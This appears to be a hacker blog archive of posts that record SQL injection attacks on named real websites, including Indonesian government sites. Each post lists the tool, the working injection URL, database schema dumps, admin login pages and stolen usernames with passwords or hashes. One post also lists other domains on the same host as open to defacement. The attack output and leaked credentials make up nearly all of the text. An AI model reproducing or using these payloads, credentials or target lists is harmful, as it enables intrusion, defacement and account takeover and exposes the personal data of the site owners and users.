[38]u_hsbc
[39]u_indojapan
[40]u_momo
[41]u_nakita
[42]u_otomotionfm
[43]u_undangan29mei
[44]urbanfest

Tuesday, October 14, 2008

[SQLi] http://www.gontha.com/

11:10 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://www.gontha.com/admin/
Admin usr:pwd --> sai:saiman
Dump:

[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 18:57:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: persada_gontha
User: persada_visitor@98.131.15.31
Version: 4.1.20-max-log
[+] Dumping data from database "persada_gontha" Table "members"
[+] Column(s) ['username', 'password', 'admin']
[+] Number of Rows: 6

[0] pfg:pfg01:0:
[1] zul:zulbas:0:
[2] sai:saiman:1:
[3] 0:
[4] yanto:hantu:0:0:0:

[-] [18:57:26]
[-] Total URL Requests 8
[-] Done


Some domains that can be defaced because this exploit
drwx--x--x 12 persadag persadag 4096 Oct 11 03:05 ajfo.com
drwx--xr-x 11 persadag persadag 4096 Oct 11 03:08 catf.javajazzfestival.com
drwx--x--x 10 persadag persadag 4096 Oct 11 03:08 globalhomes-ltd.com
drwx--x--x 18 persadag persadag 4096 Oct 11 03:11 globalyachtsltd.com
drwx--x--x 13 persadag persadag 4096 Oct 11 03:13 gontha.com
drwx--x--x 8 persadag persadag 4096 Oct 10 01:09 indopex.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 03:14 jakartaorientalfestival.com
drwx--x--x 8 persadag persadag 4096 Sep 21 15:23 javaexhibition.com
drwx--x--x 15 persadag persadag 4096 Oct 11 03:22 javajazzfestival.com
drwx--xr-x 16 persadag persadag 4096 Oct 11 02:14 jf-pro.com
drwx--x--x 27 persadag persadag 4096 Oct 3 22:01 nagosin.com
drwx--xr-x 5 persadag persadag 4096 Oct 11 03:21 persadagiriabadi.com
drwx--x--x 12 persadag persadag 4096 Oct 11 03:28 soulnationfestival.com
drwx--xr-x 8 persadag persadag 4096 Oct 11 02:41 wedogreencampaign.com

[SQLi] http://golkar.go.id

5:43 PM Posted by viperfx07 No comments
Tool --> schemafuzz v5.0
Dump:
[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,load_file(0x2f6574632f706173737764),3--

[-] [13:14:04]
[-] Total URL Requests 3
[-] Done


[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[Database]: golkar_blog_ver2
[Table: Columns]
[0]wp_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,comment_author_url,comment_author_IP,comment_date,comment_date_gmt,comment_content,comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[1]wp_links: link_id,link_url,link_name,link_image,link_target,link_category,link_description,link_visible,link_owner,link_rating,link_updated,link_rel,link_notes,link_rss
[2]wp_options: option_id,blog_id,option_name,option_value,autoload
[3]wp_postmeta: meta_id,post_id,meta_key,meta_value
[4]wp_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_category,post_excerpt,post_status,comment_status,ping_status,post_password,post_name,to_ping,pinged,post_modified,post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[5]wp_term_relationships: object_id,term_taxonomy_id,term_order
[6]wp_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[7]wp_terms: term_id,name,slug,term_group
[8]wp_usermeta: umeta_id,user_id,meta_key,meta_value
[9]wp_users: ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name

[Database]: golkar_pusat
[Table: Columns]
[0]mos_banner: bid,cid,type,name,imptotal,impmade,clicks,imageurl,clickurl,date,showBanner,checked_out,checked_out_time,editor,custombannercode
[1]mos_bannerclient: cid,name,contact,email,extrainfo,checked_out,checked_out_time,editor
[2]mos_bannerfinish: bid,cid,type,name,impressions,clicks,imageurl,datestart,dateend
[3]mos_categories: id,parent_id,title,name,image,section,image_position,description,published,checked_out,checked_out_time,editor,ordering,access,count,params
[4]mos_components: id,name,link,menuid,parent,admin_menu_link,admin_menu_alt,option,ordering,admin_menu_img,iscore,params
[5]mos_contact_details: id,name,con_position,address,suburb,state,country,postcode,telephone,fax,misc,image,imagepos,email_to,default_con,published,checked_out,checked_out_time,ordering,params,user_id,catid,access
[6]mos_content: id,title,title_alias,introtext,fulltext,state,sectionid,mask,catid,created,created_by,created_by_alias,modified,modified_by,checked_out,checked_out_time,publish_up,publish_down,images,urls,attribs,version,parentid,ordering,metakey,metadesc,access,hits
[7]mos_content_frontpage: content_id,ordering
[8]mos_content_rating: content_id,rating_sum,rating_count,lastip
[9]mos_core_acl_aro: aro_id,section_value,value,order_value,name,hidden
[10]mos_core_acl_aro_groups: group_id,parent_id,name,lft,rgt
[11]mos_core_acl_aro_sections: section_id,value,order_value,name,hidden
[12]mos_core_acl_groups_aro_map: group_id,section_value,aro_id
[13]mos_core_log_items: time_stamp,item_table,item_id,hits
[14]mos_core_log_searches: search_term,hits
[15]mos_fc_bans: created,userid,banneduserid,roomid,ip
[16]mos_fc_bot: id,bot,name,value
[17]mos_fc_bots: id,botname
[18]mos_fc_connections: id,updated,created,userid,roomid,state,color,start,lang,ip,tzoffset
[19]mos_fc_conversationlog: bot,id,input,response,uid,enteredtime
[20]mos_fc_dstore: uid,name,value,enteredtime,id
[21]mos_fc_gmcache: id,bot,template,inputstarvals,thatstarvals,topicstarvals,patternmatched,inputmatched,combined
[22]mos_fc_gossip: bot,gossip,id
[23]mos_fc_ignors: created,userid,ignoreduserid
[24]mos_fc_messages: id,created,toconnid,touserid,toroomid,command,userid,roomid,txt
[25]mos_fc_patterns: bot,id,word,ordera,parent,isend
[26]mos_fc_rooms: id,updated,created,name,password,ispublic,ispermanent
[27]mos_fc_templates: bot,id,template,pattern,that,topic
[28]mos_fc_thatindex: uid,enteredtime,id
[29]mos_fc_thatstack: thatid,id,value,enteredtime
[30]mos_feedback: id,tanggal,ip,status,nama,email,jeniskelamin,pekerjaan,umur,kota,negara,menu,jawaban,komentar
[31]mos_galeri: id,jenis,tanggal,acara,gambarlores,gambarhires
[32]mos_groups: id,name
[33]mos_komentar: id,cid,nama,email,komentar,status,tanggal
[34]mos_mambots: id,name,element,folder,access,ordering,published,iscore,client_id,checked_out,checked_out_time,params
[35]mos_menu: id,menutype,name,link,type,published,parent,componentid,sublevel,ordering,checked_out,checked_out_time,pollid,browserNav,access,utaccess,params
[36]mos_messages: message_id,user_id_from,user_id_to,folder_id,date_time,state,priority,subject,message
[37]mos_messages_cfg: user_id,cfg_name,cfg_value
[38]mos_modules: id,title,content,ordering,position,checked_out,checked_out_time,published,module,numnews,access,showtitle,params,iscore,client_id
[39]mos_modules_menu: moduleid,menuid
[40]mos_newsfeeds: catid,id,name,link,filename,published,numarticles,cache_time,checked_out,checked_out_time,ordering
[41]mos_poll_data: id,pollid,text,hits
[42]mos_poll_date: id,date,vote_id,poll_id
[43]mos_poll_menu: pollid,menuid
[44]mos_polls: id,title,voters,checked_out,checked_out_time,published,access,lag
[45]mos_sb_attachments: mesid,filelocation
[46]mos_sb_categories: id,parent,name,cat_emoticon,locked,alert_admin,moderated,moderators,pub_access,pub_recurse,admin_access,admin_recurse,ordering,future2,published,checked_out,checked_out_time,review,hits,description
[47]mos_sb_messages: id,parent,thread,catid,name,userid,email,subject,time,ip,topic_emoticon,locked,hold,ordering,hits,moved
[48]mos_sb_messages_text: mesid,message
[49]mos_sb_moderation: catid,userid,future1,future2
[50]mos_sb_sessions: userid,allowed,lasttime,readtopics
[51]mos_sb_smileys: id,code,location,greylocation,emoticonbar
[52]mos_sb_subscriptions: thread,userid,future1
[53]mos_sb_users: userid,view,signature,moderator,ordering,posts,avatar,karma,karma_time
[54]mos_sections: id,title,name,image,scope,image_position,description,published,checked_out,checked_out_time,ordering,access,count,params
[55]mos_session: username,time,session_id,guest,userid,usertype,gid
[56]mos_shoutit: id,name,userid,shout_msg,published,shout_time,shout_ip
[57]mos_stats_agents: agent,type,hits
[58]mos_suara_anda_content: kodeSuaraAndaContent,judul,isi,tanggal,status
[59]mos_suara_anda_feedback: kodeSuaraAndaFeedback,kodeSuaraAndaContent,tanggal,nama,email,kota,negara,suaranya,status
[60]mos_template_positions: id,position,description
[61]mos_templates_menu: template,menuid,client_id
[62]mos_users: id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params
[63]mos_usertypes: id,name,mask
[64]mos_weblinks: id,catid,sid,title,url,description,date,hits,published,checked_out,checked_out_time,ordering,archived,approved,params
[65]pendaftaran: kodePendaftaran,nama,no_anggota,alamat,no_telp,no_hp,no_fax,email,password,tanggalDaftar,tanggalValidasi,valid_email,admin_check

[Database]: ibs
[Table: Columns]
[0]allregmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status,username,pass
[1]bank: id,nama,cabang,norek,atasnama,status
[2]banner: id,nama,url,gambar,ukuran,status,jumlahklik
[3]belanjaanasli: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[4]belanjaantemp: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[5]berita: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[6]faktur: nomer
[7]inventoryweb: idinv,goodscode,title,description,detail,image,image2,image3,image4,harga,diskon,staonstore,stapromosi,stabestseller,stagift,kategori,subkategori,subsubkategori,pengarang,penerbit,berat,halaman,dimensi
[8]kategoriproduk: id,nama
[9]kertaskado: id,nama,gambar,status
[10]kesaksian: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[11]komentarberita: id,idberita,nama,judul,komentar,tanggal,status
[12]lyrics: idlyric,judul,penyanyi,lyrics
[13]mainmember: username,idmember,pass
[14]members: id,username,password,email,nama,alamat,kota,propinsi,kodepos,negara,status
[15]pembelitemp: id,sessio
[16]regmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status
[17]reviewproduk: id,idproduk,nama,email,judul,komentar,tanggal,status
[18]subkategoriproduk: id,kategori,nama
[19]subsubkategoriproduk: id,kategori,subkategori,nama
[20]tarif: id,kota,ekspedisi,perkilo,hari,status
[21]transaksi: id,nama,email,alamat,kodepos,kota,telepon,hp,metode,uangpecahan,kembalian,bank,norek,atasnama,tanggal,sessio,faktur,status,totalnya,konfirmasi
[22]users3: username,password

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[-] [13:24:06]
[-] Total URL Requests 926
[-] Done

[SQLi] http://en.agrimedia.com/

12:57 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://en.agrimedia.com/admin/
Admin usr:login --> admin:agri8z3 (see else in dump)
Dump:
[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:26:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26

[Database]: usr_web4_1
[Table: Columns]
[0]config: var,value,log_time
[1]counter: counter_id,dom_lang,dom_lib,counted,add_time,log_time
[2]downloads: download_id,name,filesrc,filetype,alttext,cnt_dl,log_time
[3]images: image_id,name,picsrc,url,alttext,target,log_time
[4]interest: interest_id,dom_lang,dom_lib,poll,special,email,log_time
[5]interest_rules: rule_id,dom_lang,dom_lib,rule,log_time
[6]kontakte: kontakt_id,dom_lang,title,email,typ,log_time
[7]linkbanner: banner_id,dom_lang,dom_lib,name,picsrc,url,alttext,target,status,log_time
[8]links: link_id,name,url,alttext,target,log_time
[9]logins: login_id,name,user,pass,allow_items,allow_domains,status,log_time
[10]maillist: maillist_id,allow_langs,allow_libs,email,gender,firstname,lastname,format,info,valid,cnt_errors,last_error,demo_ok,add_time,log_time
[11]metatags: metatag_id,dom_lang,dom_lib,description,keywords,log_time
[12]newsitems: news_id,dom_lang,dom_lib,pub_date,headline,summary,content,full_lnk,rel_lnk_1,rel_lnk_2,rel_lnk_3,status,log_time
[13]newsletter: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,download_id,info,add_time,log_time,start_time,finish_time
[14]press_docs: presse_id,dom_lang,dom_lib,name,filesrc1,filesrc2,filesrc3,filetype1,filetype2,filetype3,info1,info2,info3,cnt_dl_1,cnt_dl_2,cnt_dl_3,status,add_time,log_time
[15]press_news: newsletter_id,dom_lang,dom_lib,subject,content,recipients,tmp_recs,status,result_ok,result_err,cnt_total,cnt_sent,info,add_time,log_time,start_time,finish_time
[16]press_user: user_id,allow_langs,allow_libs,gender,firstname,lastname,journal,email,pwd,format,info,valid,cnt_logins,cnt_files,cnt_errors,last_error,demo_ok,log_time,add_time
[17]shop_art: art_id,dom_lang,dom_lib,item_pos,author,title,subtitle,summary,content,promotion,picthumb,piclarge,weight,price_euro,price_dollar,art_nr,isbn,biblio,published,visits,allow_cart,status,home,add_time,log_time
[18]shop_art_contents: content_id,art_id,item_pos,title,pic,log_time
[19]shop_art_examples: example_id,art_id,item_pos,title,pic,log_time
[20]shop_basket: basket_id,user_id,art_id,cnt,log_time
[21]shop_countries: country_id,country_de,country_en,short_eu,zone
[22]shop_invoice: euro_de,euro_europe,euro_world,dollar_de,dollar_europe,dollar_world,log_time
[23]shop_order_items: item_id,order_id,user_id,art_id,art_nr,title,author,isbn,weight,art_cnt,price_euro,price_dollar,add_time
[24]shop_orders: order_id,user_id,dom_lang,dom_lib,payment,currency,weight,total,vat_rate,pp_cost,remark,order_text,sik_oid,status,add_time,log_time
[25]shop_porto: porto_id,weight,porto_euro_de,porto_euro_europe,porto_euro_world,porto_dollar_de,porto_dollar_europe,porto_dollar_world,log_time
[26]shop_search: item_id,user_id,item,log_time
[27]shop_user: user_id,dom_lang,dom_lib,uid,pwd,anrede,firm,firstname,lastname,adrline1,adrline2,city,state,zip,country,tel,fax,l_anrede,l_firm,l_firstname,l_lastname,l_adrline1,l_adrline2,l_city,l_state,l_zip,l_country,l_tel,l_fax,paymode,euvatid,email,currency,logins,status,add_time,log_time
[28]texte: text_id,dom_lang,dom_lib,typ,content,log_time

[-] [20:40:31]
[-] Total URL Requests 313
[-] Done


[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*
[+] Evasion Used: "/**/" "/*"
[+] 20:54:56
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: usr_web4_1
User: web4@localhost
Version: 5.0.26
[+] Dumping data from database "usr_web4_1" Table "logins"
[+] Column(s) ['user', 'pass']
[+] Number of Rows: 4

[0] admin:agri8z3:
[1] ulrike:casanostra:
[2] marcussefrin:lueneburg:
[3] doreen:wendland:

[-] [20:55:11]
[-] Total URL Requests 6
[-] Done

[SQLi] http://www.theperfusionstore.com/

12:43 AM Posted by viperfx07 No comments


Admin login page --> http://www.theperfusionstore.com/admin/
Admin usr:pwd --> admin:p3rfusion
Dump:
[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:30:50
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log

[Database]: perfusion
[Table: Columns]
[0]config: ID,site_name,site_fullname,site_css,site_bgcolor,site_logolg,site_logosm,site_images,site_productimages,site_font1,site_font2,site_font3,site_font4,site_font5,site_color1,site_color2,site_color3,site_color4,site_color5,site_textcolor,site_copyright,site_address,site_address2,site_city,site_state,site_zip,site_fax,site_phone,site_email,site_url,site_notify,site_receipt,xSaleDiscount,xSalesTax,xShipRate,xHandling,receiptCopy,xIntShipRate,paymentgateway,send_receipt,send_notification,show_debug
[1]contacts: ID,firstname,lastname,address,address2,city,state,zip,phone,email,newsletter,entryDate
[2]gtwy_anet: ID,transkey,login,password,test_request,x_type,keepccard,x_processType,gatewayURL,x_Version,x_Merchant_Email,x_ADC_URL,x_ADC_delim_data,x_Delim_Data,x_description
[3]gtwy_linkpoint: ID,storeno,password,keyfile,gatewayURL,port,mode
[4]newsletter: ID,theSubject,box1,box2,box3,box4,box5,entryDate
[5]tblcalendar: ID,title,leadin,articlebody,articledate,entryDate,isactive,location,purchaseurl,moreurl,onhome,type,moreinfourl,fee,time
[6]tblcase: id,casetype
[7]tblcategories: ID,hidden,category,parent,description,image,titleimage,displayorder
[8]tblcontacts: ID,FirstName,LastName,Email,Phone,Fax,Address,City,Zip,State,bestContact,comments,postcard,referral,entryDate,optin
[9]tblcustomers: ID,firstname,lastname,address1,address2,city,state,zip,country,company,phone,fax,email,website,sfirstname,slastname,saddress1,saddress2,scity,sstate,szip,scountry,scompany,sphone,sfax,notes,newsletter,entryDate,lastUpdated
[10]tbllinks: ID,onhome,isactive,linkname,description,url
[11]tblmakes: ID,name
[12]tblmediaaccess: ID,uname,pword,disabled
[13]tblnews: ID,title,leadin,articlebody,articledate,entryDate,isactive,byline,bylineurl,moreurl,onhome,attachment
[14]tblorderitems: ID,RelOrderID,RelProductID,Quantity,Size,RelUnitPrice,Options,Shipping,Discount,Processed,Status,Title
[15]tblorders: OrderID,uuid,customerid,dealer,dealerRep,dealerPO,CCNum,CCName,CCYear,CCMonth,CCType,CVSNum,SaleSubTotal,SaleTotal,Tax,handling,Shipping,ShippingTotal,Discount,DiscountRate,UPS,IntlFee,ShippingMethod,Status,DateIn,TimeIn,bFirstName,bLastName,bAddress1,bAddress2,bCity,bCounty,bState,bZip,bPhone,sFirstName,sLastName,sAddress1,sAddress2,sCity,sState,sCounty,sZip,sPhone,sCountry,bCountry,Message,bFax,sFax,bCompany,sCompany,bEmail,sEmail,ipaddress,oAuthorization,lastModified,shippingdate,intorder
[16]tblpaymentgateway: ID,gateway,name,tablename,module
[17]tblproducts: ID,isactive,onsale,product,sku,price,saleprice,listprice,category,has_sizes,description,weight,shipping,status,feature1,feature2,feature3,feature4,image1,image2,image3,image4,entryDate,lastmodified
[18]tblsitecontent: ID,section,content
[19]tblstatus: id,status
[20]tblstyle: id,style
[21]tbltypes: ID,name
[22]tbluserlog: fldauto,fldusername,fldinout,fldipaddress,entryDateTime
[23]tbluserroles: UserRoleID,UserRoleName,UserRoleType,UserRoleFunction
[24]tbluserroletypes: ID,UserRoleType
[25]tblusers: UserID,lastname,firstname,permission,username,password,email,comments,roles,disabled,superUser,lastlogin

[-] [20:39:01]
[-] Total URL Requests 311
[-] Done


[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:40:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log
[+] Dumping data from database "perfusion" Table "tblusers"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] admin:85c51eef704f837ab85006998db06448:

[-] [20:40:07]
[-] Total URL Requests 3
[-] Done

[SQLi] http://www.racewithfaith.com

12:18 AM Posted by viperfx07 No comments


Tool: schemafuzz.py v5.0
Admin login page --> http://www.racewithfaith.com/admin/
Admi:n usr:pwd --> dana:vr00m
Dump
[+] URL:http://www.racewithfaith.com/newsdetail.php?ID=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 20:12:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: racewith_sited
User: racewith@server284.com
Version: 4.0.27-log
[+] Dumping data from database "racewith_sited" Table "login"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] dana:vr00m:vr00m:

[-] [20:12:16]
[-] Total URL Requests 3
[-] Done

Monday, October 13, 2008

[SQLi] http://www.fiacona.org

7:42 PM Posted by viperfx07 No comments

[SQLi] http://www.arabeuropean.org

6:32 PM Posted by viperfx07 No comments


Tool --> blindext.py v3.0 (blind SQL injection)

Database info:
[+] URL:http://www.arabeuropean.org/newsdetail.php?ID=94
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:05:23
[0]: 4.1.22-standard:harabe30_arabsen@localhost:harabe30_arabseng


Admin login page --> http://www.arabeuropean.org/admin/
Admin usr:pwd -->[0]: admin:onlyoneo1 [1]: mohamed:moslapen [2]: karim:hassoun

[SQLi] http://www.bainfokomsumut.go.id/

6:07 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin login page --> http://www.bainfokomsumut.go.id/
Admin usr:pwd --> riza:milanista
Dump:
[+] URL:http://www.bainfokomsumut.go.id/detail.php?id=1634+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5--
[+] Evasion Used: "+" "--"
[+] 13:27:39
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bainfo_infokom
User: bainfo@localhost
Version: 5.0.51a-community

[Database]: bainfo_infokom
[Table: Columns]
[0]agenda: id,text,day,month,year
[1]artikel: id,prajudul,title,singkat,lengkap,waktu
[2]berita: id,prajudul,title,singkat,lengkap,waktu
[3]counter: id,hits
[4]gallery: id,waktu,namafile,ukuran,keterangan,hits,kategori
[5]gempa: id,prajudul,title,singkat,lengkap,waktu
[6]gis: id,prajudul,title,singkat,lengkap,waktu
[7]h5n1: id,prajudul,title,singkat,lengkap,waktu
[8]harga: id,waktu,namafile,ukuran
[9]pegawai: id,Nama,NIP,JK,Jabatan,Pangkat,Pendidikan,Tempat,Lahir,Gol,Status,Alamat,Tlp,HP,Waktu
[10]photo: id,waktu,namafile,ukuran,deskripsi
[11]pilkada: id,prajudul,title,singkat,lengkap,waktu
[12]poll_comment: com_id,poll_id,time,host,browser,name,email,message
[13]poll_config: config_id,base_gif,lang,title,vote_button,result_text,total_text,voted,send_com,img_height,img_length,table_width,bgcolor_tab,bgcolor_fr,font_face,font_color,type,check_ip,lock_timeout,time_offset,entry_pp,poll_version,base_url,result_order,def_options,polls_pp
[14]poll_data: id,poll_id,option_id,option_text,color,votes
[15]poll_index: poll_id,question,timestamp,status,logging,exp_time,expire,comments
[16]poll_ip: ip_id,poll_id,ip_addr,timestamp
[17]poll_log: log_id,poll_id,option_id,timestamp,ip_addr,host,agent
[18]poll_templates: tpl_id,tplset_id,title,template
[19]poll_templateset: tplset_id,tplset_name,created
[20]poll_user: user_id,username,userpass,session,last_visit
[21]prima: id,prajudul,title,singkat,lengkap,waktu
[22]sambutan: id,waktu,namafile,ukuran,deskripsi
[23]seratus: id,prajudul,title,singkat,lengkap,waktu
[24]tamu: id,nama,email,alamat,komentar,waktu,IP
[25]users: user_id,username,password

[-] [13:28:17]
[-] Total URL Requests 174
[-] Done


[+] URL:http://www.bainfokomsumut.go.id/detail.php?id=1634+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5--
[+] Evasion Used: "+" "--"
[+] 13:28:37
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bainfo_infokom
User: bainfo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "bainfo_infokom" Table "users"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 3

[0] admin:ea0ac9fae1758db74589faee92202fdc:
[1] landsmile:a3bf971c78083493a21d74396ba9d4c2:
[2] riza:045422f6db8d978a28a6df66ffa986cd: ==> milanista

[-] [13:28:38]
[-] Total URL Requests 5
[-] Done

[SQLi] http://ukbi.pusatbahasa.diknas.go.id

5:55 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0 and instinct ^^
Admin loc --> http://ukbi.pusatbahasa.diknas.go.id/admin_ukbi.php
Admin usr:pwd --> ukbi:ukbi2007 (see more in above pic)
Dump:
[+] URL:http://ukbi.pusatbahasa.diknas.go.id/detail.php?id=29+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 13:51:41
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: admukbi_ukbi
User: admukbi_ukbi@localhost
Version: 4.1.22-standard
[+] Dumping data from database "admukbi_ukbi" Table "admin"
[+] Column(s) ['password', 'email']
[+] Number of Rows: 3

[0] ukbi2007:loexman2003@yahoo.com:
[1] forumukbi:forum@ukbi.pusatbahasa.diknas.go.id:
[2] beritaukbi:berita@ukbi.pusatbahasa.diknas.go.id:

[SQLi] http://papua.litbang.deptan.go.id

5:07 PM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://papua.litbang.deptan.go.id/login.html
Admin usr:pwd --> admin:n0rm1 (see the others in dump or above pic)
Dump:
[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 12:58:37
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: papua
User: papua@localhost
Version: 5.0.22-Debian_0ubuntu6.06.10-log

[Database]: papua
[Table: Columns]
[0]anggota: no,nama,password,level,email
[1]berita: no_berita,judul,penulis,tanggal,jam,kategori,isi_berita,gambar
[2]kategori: no,isi

[-] [12:58:40]
[-] Total URL Requests 17
[-] Done


[+] URL:http://papua.litbang.deptan.go.id/detail.php?id=10+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 13:00:14
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: papua
User: papua@localhost
Version: 5.0.22-Debian_0ubuntu6.06.10-log
[+] Dumping data from database "papua" Table "anggota"
[+] Column(s) ['nama', 'password', 'email']
[+] Number of Rows: 3

[0] admin:n0rm1:webmaster@riset-it.com:
[1] Herman Masbaitubun:dip461:liwarwartel@yahoo.com:
[2] J.Limbongan:papa:j_limbongan@yahoo.com:j_limbongan@yahoo.com:

[-] [13:00:15]
[-] Total URL Requests 5
[-] Done

[SQLi] http://inixindojogja.com/

1:50 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://inixindojogja.com/admin/
Admin usr:pwd --> webadmin:webj0gja2006
Dump:
[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--
